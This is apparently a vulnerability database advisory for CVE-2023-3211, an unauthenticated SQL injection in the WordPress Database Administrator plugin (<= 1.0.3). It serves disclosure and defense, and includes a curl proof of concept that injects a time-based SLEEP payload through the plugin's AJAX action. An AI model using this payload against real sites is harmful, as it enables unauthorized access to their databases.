WordPress Plugin Vulnerabilities

WordPress Database Administrator <= 1.0.3 - Unauthenticated SQL Injection

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

Run the command: 

`curl -i -s -k -X POST --data-binary "action=wdaSetTableActionResponse&table=wp_users%20WHERE%20SLEEP(1)=1%20&request=browse" "https://example.com/wp-admin/admin-ajax.php"`

and see that the response is slow due to the `SLEEP` function.

Affects Plugins

Plugin icon
wp-database-admin
No known fix

References

CVE
CVE-2023-3211

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Christiaan Swiers
Submitter
Christiaan Swiers
Submitter website
https://mijnsecuritypartner.nl
Submitter twitter
YouGina
Verified
Yes
WPVDB ID
873824f0-e8b1-45bd-8579-bc3c649a54e5

Timeline

Publicly Published
2023-07-24 (about 4 months ago)
Added
2023-07-24 (about 4 months ago)
Last Updated
2023-07-24 (about 4 months ago)

Other

Published
Title
Published
2021-07-24
Title
Broken Link Manager <= 0.6.5 - Authenticated (admin+) SQL Injection
Published
2018-01-10
Title
Testimonial Slider <= 1.2.4 - Authenticated SQL Injection
Published
2015-03-16
Title
Pods 1.4.7 <= 2.5.1.1 - Blind SQL Injection
Published
2020-11-02
Title
AccessPress Social Icons < 1.8.1 - Authenticated SQL Injection
Published
2014-08-01
Title
Spiffy XSPF Player 0.1 - playlist.php playlist_id Parameter SQL Injection